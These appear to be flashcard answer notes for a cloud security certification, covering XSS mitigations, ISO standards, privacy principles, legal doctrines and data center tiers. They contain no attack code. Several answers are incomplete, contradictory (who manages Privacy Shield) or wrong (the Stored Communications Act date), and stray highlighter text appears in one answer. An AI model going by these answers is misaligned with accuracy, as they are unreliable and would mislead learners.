A cross-site scripting (XSS) attack occurs when an application receives untrusted data and then sends it to a web browser without proper validation, allowing an attacker to execute scripts in the user’s browser, hijack sessions, or engage in other malicious behavior.

reduce techniques:
Put untrusted data in only allowed slots of HTML documents.

HTML escape when including untrusted data in any HTML elements.

Use the attribute escape when including untrusted data in attribute elements.

Use an auto-escaping template system.

HTML escape JSON values in an HTML context and read the data with JSON.parse.

Sanitize HTML markup with a library designed for the purpose.

Answer 209

A

API Gateway
Database
WAF

Answer 210

A

Process isolation can reduce the possibility of side-channel attacks in an environment with shared resources.

Answer 211

A

Organizational Normative Framework (ONF), Application Normative Framework (ANF)

Answer 212

A

Extensible Markup Language (XML), JavaScript Open Notation (JSON)

Answer 213

A

The data owner is responsible for the disposition of the data under their control; this includes access decisions.

Answer 214

A

an informal industry term for moving applications from a traditional environment into the cloud

Answer 215

A

Cloud migration is the process of transitioning all or part of a company’s data, applications, and services from onsite premises behind the firewall to the cloud. This enables information to be provided over the Internet on an on-demand basis.

Answer 216

A

OpenID Connect is a federation protocol that uses representational state transfer (REST) and JavaScript Object Notation (JSON); it was specifically designed with mobile apps in mind, instead of only web-based federation.

WS-Federation is a federation protocol that is part of the WS-Security family of standards and reliant on Simple Object Access Protocol (SOAP)

Answer 217

A

open federated protocols like SAML, OAuth 2.0, and OpenID Connect.

Answer 218

A

For high-risk operations and data that is particularly sensitive

Answer 219

A

Which security tool can perform content inspection of Secure File Transfer Protocol (SFTP) communications?

The XML gateway can provide this functionality”; it acts as a reverse proxy and can perform content inspection on many traffic protocols.

Answer 220

A

Running an application on an endpoint without installing it
Running an application in a non-native environment

Answer 221

A

TLS maintains the confidentiality and integrity of communications, often between a web browser and a server.

TLS uses symmetric key crypto for each communications session in order to secure the connection; the session key is uniquely generated each time a new connection is made

Answer 222

A

Vulnerability scans use signatures of known vulnerabilities to detect and report those vulnerabilities.

Answer 223

A

DAST:Path coverage
SAST: Code coverage

Answer 224

A

Compliance with the Payment Card Industry Data Security Standard (PCI DSS)

By offloading privacy data to a tokenizing third party, merchants can free themselves of the contractual burdens for protecting cardholder data at rest.

Answer 225

A

Installing malware on systems owned by someone else may be illegal in many jurisdictions. While on-premises sandboxes are fine for this purpose, it may be a felony if performed in the cloud.

Answer 226

A

ISO 27034 addresses the sets of controls used in software throughout the environment.

Answer 227

A

Open source software includes programs where customers (or even the public) can view the software’s source code.

Open source review can detect flaws /programming defects that a structured testing method might not.

Answer 228

A

REST calls web resources by using uniform resource identifiers (URIs).

Answer 229

A

The Agile method reduces the dependence and importance of documentation in favor of functioning software versions.

Answer 230

A

Threat modeling (e.g., Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege (STRIDE), Disaster, Reproducibility, Exploitability, Affected Users, and Discoverability (DREAD), Architecture, Threats, Attack Surfaces, and Mitigations (ATASM), Process for Attack Simulation and Threat Analysis (PASTA))

Answer 231

A

The STAR program’s open certification framework contains three levels: self-assessment (Level 1), third-party audit (Level 2), and continuous auditing (Level 3).

Answer 232

A

An SOC Type I report is designed around a specific point in time as opposed to a report of effectiveness over a period of time.

An SOC Type II report is designed around a period of time as opposed to a specific point in time.

Answer 233

A

The doctrine of the proper law refers to how jurisdictional disputes are settled.

Answer 234

A

The silver platter doctrine allows law enforcement entities to use material presented voluntarily by the owner as evidence in the prosecution of crimes, without a warrant or a court order.

Answer 235

A

The doctrine of plain view allows law enforcement to act on probable cause when evidence of a crime is within their presence

Answer 236

A

The Restatement (Second) Conflict of Law is the basis used for determining which laws are most appropriate in a situation where conflicting laws exist.

Answer 237

A

The Stored Communication Act, passed in 1995, is old, in bad need of updating, and unclear with regard to newer technologies.

Answer 238

A

KRI stands for key risk indicator. KRIs are the red flags if you will in the world of risk management. When these change, they indicate something is amiss and should be looked at quickly to determine if the change is minor or indicative of something important.

Answer 239

A

International Organization for Standardization (ISO) 31000:2009 specifically focuses on design implementation and management

Answer 240

A

International Organization for Standardization (ISO) 27017 is about cloud specific security controls

Answer 241

A

is an industry standard that provides guidance for eDiscovery programs.

Answer 242

A

National Institute of Standards and Technology (NIST) 800-92 is about log management,

Answer 243

A

European Union Agency for Network and Information Security (ENISA)

specifically identifies the top 8 security risks based on likelihood and impact.

European Union Agency for Network and Information Security (ENISA) identifies 35 types of risks organizations should consider but goes further by identifying the top eight security risks based on likelihood and impact.

Answer 244

A

to addressing security risks in a supply chain

Answer 245

A

International Organization for Standardization (ISO) 31000:2009 is an international standard that focuses on designing, implementing, and reviewing risk management processes and practices

Answer 246

A

National Institute of Standards and Technology (NIST) SP 800-37 is the Guide for Implementing the Risk Management Framework (RMF), a methodology for handling all organizational risk in a holistic, comprehensive, and continual manner.

Answer 247

A

Key risk indicators (KRIs) try to predict future risk, while key performance indicators (KPIs) examine events that have already happened. The other answers are just distractors.

Answer 248

A

An inventory of cloud service security controls that are arranged into separate security domains

Answer 249

A

The acceptable use policy (AUP) is designed to make clear to employees what is acceptable as well as unacceptable use of company-owned computing equipment and data such as email.

Answer 250

A

ISO 20000-1 describes service management.

ISO 27001 describes an information security management system.

ITIL is not an ISO standard, nor is COBIT—in fact, they’re their own standards.

Answer 251

A

ISO 27001 describes an information security management system (ISMS) as a set of interrelated elements that organizations use to manage and control information security risks to protect and preserve the confidentiality, integrity, and availability of information.

Answer 252

A

ISO standard for collecting, preserving, and identifying electronic evidence.

Answer 253

A

The Cloud Security Alliance (CSA) is the world’s leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment.

Answer 254

A

ISO publishes and maintains the Common Criteria program.

Answer 255

A

The Diffie-Hellman key exchange process is designed to allow two parties to create a shared secret (symmetric key) over an untrusted medium

RADIUS is an outmoded access control service for remote users. RSA is an encryption scheme.

TACACS is a network access protocol set used through a centralized server.

Answer 256

A

The collection limitation principle requires any entity that gathers personally identifiable information (PII) about a person to restrict data collection to only information that is necessary for the transaction, and only with the knowledge and permission of the individual.

The data quality principle requires any entity that gathers personally identifiable information (PII) about a person to ensure that the data remains valid and accurate and allows for corrections by the data subject

The purpose specification principle requires any entity that gathers personally identifiable information (PII) about a person to clearly state the explicit purpose for which the PII will be used.

The use limitation principle requires any entity that gathers personally identifiable information (PII) about a person to restrict the use of that PII to that which was permitted by the data subject and the reason given when it was collected.

The security safeguards principle requires any entity that gathers personally identifiable information (PII) about a person to protect that data against unauthorized access and modification

The openness principle requires any entity that gathers personally identifiable information (PII) about a person to allow that person to access the information.

Answer 257

A

Voluntary for non–European Union (EU) entities

Answer 258

A

The Department of Commerce manages the Privacy Shield program in the United States; the Departments of State and Interior do not. There is no Department of Trade.

Answer 259

A

The 27002 standard contains sets of controls to be used in order to allow the organization to match the security program created for the organization with 27001

NIST SP 800-53 allows the organization to craft a set of controls to meet the requirements created for and by the organization when using NIST SP 800-37

Answer 260

A

The silver platter doctrine allows law enforcement entities to use material presented voluntarily by the owner as evidence in the prosecution of crimes, without a warrant or a court order.

Answer 261

A

File hashes can serve as integrity checks for both configuration management (to determine which systems are not configured to the baseline) and audit purposes (as artifacts/common builds of systems for audit review).

Answer 262

A

The Reporting phase of forensic investigation usually involves presenting findings to

Answer 263

A

The FTC is in charge of the Privacy Shield program.

Answer 264

A

The CMM is a way of determining a target’s maturity in terms of process documentation and repeatability

Answer 265

A

The PCI DSS is extremely thorough and wide reaching.

Merchants at different tiers are required to have more or fewer audits in the same time frame as merchants in other tiers, depending on the tier.
All PCI DSS–compliant merchants must meet all the control and audit requirements of the standard;

Answer 266

A

patent : 20 years

copy right : life of the author + 70 years then
Copyrights expire after a certain duration and then fall into the public domain, where they can be used by anyone for any purpose. This material certainly exceeds the time of any copyright protection.

trademark:
10 years from the date of registration, with a potentially unlimited number of 10-year renewal terms. renew it with the U.S. Patent and Trademark Office (USPTO)

trade secrets:
Unlike patents, which typically have a shelf life of twenty years, trade secrets last indefinitely. Trade secrets last as long as the secret can be kept

Answer 267

A

Both ISO 31000 and National Institute of Standards and Technology (NIST) 800-37 are risk management frameworks.

Answer 268

A

The Cloud Security Alliance is a volunteer organization that includes members from various industries and sectors and is focused on cloud computing. It relies largely on member participation for developing standards

Answer 269

A

The Cloud Controls Matrix is an excellent tool for determining completeness and possible replication of security controls.

Answer 270

A

Intellectual property disputes are usually settled in civil court, as a conflict among private parties.

Answer 271

A

Trademark protection is provided to those who apply for it, to either a state or federal trademark registration body. In the case of conflicting usage (or infringement), courts will take many criteria into account, including which party has first claim on the trademark (that is, who used it the longest), the location(s) where the trademark is used, the possibility for confusion among customers, and so forth. But for a specific location and specific business purpose, the deciding element will probably be which party first registered the trademark in question.

Answer 272

A

SLA elements should be objective, numeric values, for repeated activity.

Eg: The specific amount of data that can be uploaded to the cloud environment in any given month

Answer 273

A

Criminal law is set out in rules and statutes created by a government, prohibiting certain activities as a means of protecting the safety and well-being of its citizens. Violations generally consist of both monetary and/or loss of liberty punishments.

Answer 274

A

Tort law refers the body of laws that provide remedies to individuals who have been caused harm by unreasonable acts of others. Negligence is the most common type of tort lawsuit.

Answer 275

A

Spoliation is the term used to describe the destruction of potential evidence (intentionally or otherwise); in various jurisdictions, it can be a crime, or the grounds for another lawsuit.

Answer 276

A

The DMCA criminalizes the production or dissemination of technology, devices, or services intended to circumvent copyright techniques used to protect digital media such as video and audio recordings; this includes some decryption tools.

Answer 277

A

Typically, a discovery tool is a primary component of a DLP solution. This might be employed for purposes of identifying and collecting pertinent data

Answer 278

A

Contracts are agreements between parties to exchange goods and services

Answer 279

A

legal practice of removing a suspect from one jurisdiction to another in order for the suspect to face prosecution for violating laws in the latter

Answer 280

A

focuses on design implementation and management.

Answer 281

A

Voluntary for non–European Union (EU) entities

Answer 282

A

The AICPA, the OECD, and the EU have all outlined certain basic expectations for entities that are privacy data controllers; these expectations are extremely similar in the documentation produced by all three

Answer 283

A

Purpose specification principle
Use limitation principle

Answer 284

A

Cryptography for the two main types of APIs is required; this is TLS for representational state transfer (REST) and message-level encryption for Simple Object Access Protocol (SOAP).

Answer 285

A

SLA elements should be objective, numeric values, for repeated activity.

Answer 286

A

Your company operates under a high degree of regulatory scrutiny

Answer 287

A

The customer is still responsible for some software licensing and maintenance activities (and therefore costs) in infrastructure as a service (IaaS) and platform as a service (PaaS) models;

In a software as a service (SaaS) model, the cloud provider is tasked with acquiring and managing the software licenses; the scale of a cloud provider’s operations can allow them to reduce the per-seat cost of software considerably.

Answer 288

A

for contingency backup and archiving purposes.
Tier 1 data center should suffice; it is the cheapest, and you need it only for occasional backup purposes (as opposed to constant access). The details of location and market are irrelevant.

Tier 1: to support an organization that wants to conduct IT operations

Tier 1 data centers are expected to help protect Lime Highlight created at 1:29 PM on 9/6/24against human error, not outages or disasters. They’re also expected to have redundancy for chillers, pumps, UPS devices, and generators but are likely to have to shut down for maintenance activities.

Answer 289

A

Tier 2 facilities provide more redundancy than Tier 1 facilities.

Tier 2 facilities are intended to ensure that critical operations are not interrupted due to planned maintenance.

Answer 290

A

The Tier 3 design is known as a “concurrently maintainable site infrastructure.” As the name indicates, the facility features both the redundant capacity components of aTier 2 build and the added benefit of multiple distribution paths where only a sole path is needed to serve critical operations at any given time.

Answer 291

A

Tier 4 data centers are the highest level described by the Uptime Institute.

They have independent and physically isolated systems providing redundancy and resiliency at both the component and distribution path levels, ensuring that events that compromised one system would not take out the redundant system.

Answer 292

A

Uptime Percentage:

Tier 1: 99.671
Tier 2: 99.741
Tier 3: 99.982
Tier 4: 99.995

Answer 293

A

south korea
The United States

Answer 294

A

company’s collaboration needs.

Answer 295

A

highly sensitive industries, including aerospace and pharmaceuticals.

Answer 296

A

The TCI does not, specifically, require cost-effectiveness of cloud services.

Answer 297

A

Management plane breach allows an attacker to gain full control of the environment and can affect all aspects of the CIA triad.

Answer 298

A

One type of cloud storage wherein cloud and enterprise storage both reside inside the enterprise behind the firewall.

Answer 299

A

This form of cloud storage involves the enterprise and storage service being separate, with data stored outside the confines of the enterprise environment.

Answer 300

A

This form of cloud storage applies to storing mobile device data in the cloud while providing access to the stored data from anywhere.

Answer 301

A

A set of processes and structures used to effectively manage all risks to an enterprise.

Answer 302

A

Situations where humidity is too high may result in the buildup of moisture and corrosion of equipment. If humidity falls too low, it may result in static electricity issues. Humidity issues generally do not contribute to fires or physical access control failures

Answer 303

A

Inert gas systems use no water and are unlikely to damage sensitive electronic equipment, even if discharged. Wet pipe, dry pipe, and preaction systems all use water and may damage or destroy electronic equipment if activated or damaged.

Answer 304

A

To be used in a secure manner, certificates must take advantage of a hash function that is not prone to collisions. The MD2, MD4, MD5, and SHA-1 algorithms all have demonstrated weaknesses and would trigger a vulnerability. The SHA-256 algorithm is still considered secure.

Answer 305

A

The recipient of a message encrypted using an asymmetric encryption algorithm decrypts that message using their own private key. Therefore, Alice should use her own private key to decrypt the message that Bob encrypted using Alice’s public key.

Answer 306

A

The purpose of an uninterruptible power supply (UPS) is to provide power to systems for a short period of time. They provide immediate backup power from a battery that should be quickly replaced by long-term backup power from a generator or similar source. For this reason, you should only expect the UPS to last for about 10 minutes

Answer 307

A

There are two possible techniques for revoking a digital certificate: updating the certificate’s status using the Online Certificate Status Protocol (OCSP) and adding the certificate to a Certificate Revocation List (CRL). Of these, OCSP provides faster updates and is the preferred method. It is not possible to change the public or private keys associated with an existing digital certificate.

Answer 308

A

Ephemeral storage is temporary storage associated with a server instance. It will be deleted if the server is terminated, but it will not be deleted if the server is simply stopped or rebooted. Stopping a server allows it to be restarted at a later time, which requires access to the ephemeral storage. Terminating a server completely deletes it and the ephemeral storage.

Answer 309

A

Tokenization is an approved alternative to encryption for complying with Payment Card Industry (PCI) requirements.

Answer 310

A

RAID technology provides fault tolerance for hard drive failures and is an example of a business continuity action.

Restoring from backup tapes, relocating to a cold site, and restarting business operations are all disaster recovery actions.

Answer 311

A

SOAP uses an XML-based approach to interoperability, allowing systems to interact more easily

Answer 312

A

Broadcast packets sent by a machine inside the VLAN will reach all other machines in that VLAN.

Broadcast packets sent from a machine outside the VLAN will not reach machines inside the VLAN.

Broadcast packets sent by a machine inside the VLAN will not reach machines outside the VLAN.

Answer 313

A

Threat definition

Target identification

Facility characteristics

Answer 314

A

Role-based

Answer 315

A

Synthetic agents can simulate user activity in a much faster, broader manner and perform these actions 24/7 without rest.

Answer 316

A

Inference is an attack strategy, not a reason for implementing tokenization. All the other answers are good reasons to implement tokenization, and they are therefore not correct

Answer 317

A

It may require trust in additional third parties beyond the primary cloud service provider.

Significantly greater processing overhead

Some risk to availability, depending on the implementation

Answer 318

A

a data discovery approach that offers insight to trends of trends, using both historical and predictive approaches

Answer 319

A

a data discovery approach used by e-commerce retailers to discern and predict shoppers’ needs?

Answer 320

A

Egress monitoring solutions

Answer 321

A

a cryptographic one-way function applied to data in a database to allow it to be referenced without using the actual data

Answer 322

A

management plane of a cloud datacenter

Answer 323

A

SAML is an XML-based protocol, and Kristen knows that an XML firewall that is SAML-aware with appropriate rules for identity-based protection would be her best option. IDS systems cannot rate-limit even if they are SAML-aware. WAFs are designed for web applications rather than specifically for XML and SAML-based filtering, and a DAM is a database-specific tool.

Answer 324

A

A. ASVS uses a three-level code validation assurance level model, with level 3 requiring critical applications to meet in-depth validation and testing requirements.

Answer 325

A

A virtual trusted platform module (vTPM) is the only solution that will meet Jack’s needs. HSMs (hardware security modules) are used to create, store, and manage secrets, including cryptographic keys and certificates, but aren’t used for boot security.

Answer 326

A

ISO 20000-1 describes service management.
ISO 27001: information security management system (ISMS), the organisation’s entire security program, cyber security control objectives
ISO 27002: covers cybersecurity control implementation
ISO 27017: designed for cloud service providers
ISO 27018 describes privacy requirements for cloud providers
ISO 27034 mandates a framework for application security within an organization (ONF, ANF)
ISO 27037 : collecting, preserving, and identifying electronic evidence.
ISO 27050 : guidance for eDiscovery programs
ISO 27701 : industry standard guidance for information privacy programs.

ISO 28000 : specifies security management systems
ISO31000 - focuses on design implementation and management.

ISAE 3402 : International Standard on Assurance Engagements
ISAE 3410 - Assurance Engagements on Greenhouse Gas Statements
SSAE 16
SSAE 18 : Statement on Standards for Attestation Engagements 18, is a set of auditing standards that help businesses evaluate the controls of their service providers

Brainscape's Knowledge GenomeTM

Learnzapp Flashcards

Brainscape's Knowledge Genome^TM